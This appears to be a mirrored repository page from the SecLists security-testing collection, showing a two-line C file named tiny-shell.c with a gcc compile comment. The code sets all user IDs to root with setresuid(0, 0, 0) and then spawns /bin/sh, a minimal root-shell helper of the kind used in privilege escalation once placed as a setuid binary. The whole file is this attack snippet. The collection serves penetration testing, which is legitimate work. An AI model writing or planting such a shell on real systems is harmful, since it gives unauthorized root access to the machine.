mirror of
https://github.com/danbulant/SecLists
synced 2026-05-19 12:28:58 +00:00
2 lines
76 B
C
2 lines
76 B
C
// $ gcc tiny-shell.c
|
|
int main(void){setresuid(0, 0, 0);system("/bin/sh");}
|